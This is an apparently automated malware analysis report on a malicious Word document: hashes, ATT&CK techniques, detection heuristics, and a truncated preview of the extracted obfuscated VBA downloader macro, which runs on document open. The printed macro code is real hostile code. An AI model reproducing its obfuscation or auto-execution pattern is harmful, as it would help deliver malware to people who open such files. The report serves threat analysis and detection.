Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 90a3beebaa085403…

MALICIOUS

Office (OLE)

246.3 KB Created: 2020-01-16 15:19:00 Authoring application: Microsoft Office Word First seen: 2020-08-10
MD5: 6f13a4a78993056b87be994625d942d2 SHA-1: 6a96d8a5f790768f23ca364cff3f94e572896151 SHA-256: 90a3beebaa0854035394ebb503a93b46b7858f539ac30bd19e1af068fecee85f
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is a Microsoft Office document containing a VBA macro that is automatically executed upon opening (Document_Open). The macro utilizes GetObject and p-code execution, indicating an attempt to run malicious code. The ClamAV detection as 'Doc.Downloader.Generic' strongly suggests its purpose is to download and execute a secondary payload. No specific family could be identified.

Heuristics 6

  • ClamAV: Doc.Downloader.Generic-7542953-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-7542953-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11375 bytes
SHA-256: 8a86308c7488d3a3487edcd188bd5f3ab1c438cbbd70d0fd2c22e27b6bfccfe3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Eqwsqawl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Tyqsnjabq
End Sub

Attribute VB_Name = "Cuzfalodaovlu"
Attribute VB_Base = "0{18D111D9-FD98-485D-B2D4-DB0E8E982DE9}{EFF2A754-DB18-4F25-B1B8-77BF9F6E9DC9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Fzhllwhpyp"
Function Xvbedlidaw()
   Do While Gprdphnrkdl = 900
            Do While Jpmwivpqqigw = 3 + 2
            Egftusedw = Chr(4)
            Mvgpzbpjcc = Sqr(9) + Sleawpglg
            Ilejrhqfszjva = CLng(Qhqmdflb)
            Pshnqbgdwy = Int(1 + 1)
            Rxclxafiperw = CDate(QKoWc)
            Uufswksacpjrc = 9 + Int(4)
            Loop
            Do While Rdlvvptk = 2 + 4
            Lvdslalor = CLng(Ydbucrvncf)
            Fyagadjbk = Int(1 + 4)
            Koohqoxdlr = 2 + Int(3)
            Ajbsyxwodnny = Chr(6)
            Uklhfbjtqf = Sqr(7) + Fyecnqmeax
            Ldnzhxapnf = CDate(QKoWc)
            Loop
Loop
Kkpnzqpy = ChrW(wdKeyP)
   Do While Wbwyehqsb = 900
            Do While Wygnceswwqgl = 3 + 2
            Cesyisgd = Chr(4)
            Oiuolcxo = Sqr(9) + Xtmvquxbyoqqi
            Dxutelti = CLng(Ukelutrqofjsx)
            Ufeblyzzmhe = Int(1 + 1)
            Rmdkiwwktpeu = CDate(QKoWc)
            Uoslzmfjgpgra = 9 + Int(4)
            Loop
            Do While Sdprvzcbzj = 2 + 4
            Dbpzhnyfku = CLng(Pqhfodqvb)
            Lodcarnt = Int(1 + 4)
            Bbhrpzecpayhl = 2 + Int(3)
            Rxnvtgjdb = Chr(6)
            Ekxnxbvgno = Sqr(7) + Yelsmzbedbx
            Zxhrsxgnevue = CDate(QKoWc)
            Loop
Loop
Vfdlkdakfcaq = Kkpnzqpy + Cuzfalodaovlu.Zeyjdarrlbsv + Cuzfalodaovlu.Auxjplcuki
   Do While Lkypjxbqkujuh = 900
            Do While Rxjeilmj = 3 + 2
            Csatwkes = Chr(4)
            Yvshbkskkzv = Sqr(9) + Fvaegrmyb
            Gfbxnjfbfed = CLng(Bdxsbznh)
            Uxwgybppxjf = Int(1 + 1)
            Juxattrbbzvdc = CDate(QKoWc)
            Wbxfbsgzqdha = 9 + Int(4)
            Loop
            Do While Gmyzhoxeyto = 2 + 4
            Tybdvhwsvl = CLng(Ddvgxmsblvnxd)
            Vscdrofnb = Int(1 + 4)
            Mtuxlaxadkcxb = 2 + Int(3)
            Maxkdazbazshj = Chr(6)
            Qurxzyhoknzds = Sqr(7) + Ubwvbfpqlzmr
            Ssoofuigeiwel = CDate(QKoWc)
            Loop
Loop
Fack = Cuzfalodaovlu.Qnwuylavk.Tag
Vglylxixtexlb = Split(Vfdlkdakfcaq + LTrim(LTrim(Fack)), "9_msnnj883hn///")
   Do While Ifzfpotjepch = 900
            Do While Routdjlupw = 3 + 2
            Hyvaqcdehhy = Chr(4)
            Idzrmvifatlmm = Sqr(9) + Hopdyahuo
            Zeedkqaxugmcd = CLng(Jhekodswwsruv)
            Ilmnweaw = Int(1 + 1)
            Lppavlmdarzq = CDate(QKoWc)
            Uhiiktvfcsy = 9 + Int(4)
            Loop
            Do While Petikwpcocv = 2 + 4
            Erudcshwt = CLng(Smpzgmxcuvwzh)
            Uongemhdodl = Int(1 + 4)
            Futwpxqygpw = 2 + Int(3)
            Thlirnuny = Chr(6)
            Mkjljbvung = Sqr(7) + Czkjsqnyreytz
            Lyedhbkje = CDate(QKoWc)
            Loop
Loop
Xvbedlidaw = Jydxcoaz + Join(Vglylxixtexlb, "") + Jydxcoaz
   Do While Hxrpznmw = 900
            Do While Xulmenjp = 3 + 2
            Knkutqlh = Chr(4)
            Nnebxxqt = Sqr(9) + Pmvsfuqeh
            Urdrtmxvic = CLng(Sqjpjpgxpwam)
            Spzahaxrswbj = Int(1 + 1)
            Txkbktccve = CDate(QKoWc)
            Ajtxqrtbuiw = 9 + Int(4)
            Loop
            Do While Evbxmozlvdrm = 2 + 4
            Epptvtsz = CLng(Ugjqcqkbcgfyb)
            Phcefclrpp = Int(1 + 4)
            Oboceidcg = 2 + Int(3)
            Jetqjsvgol = Chr(6)
            Lpuiviot
... (truncated)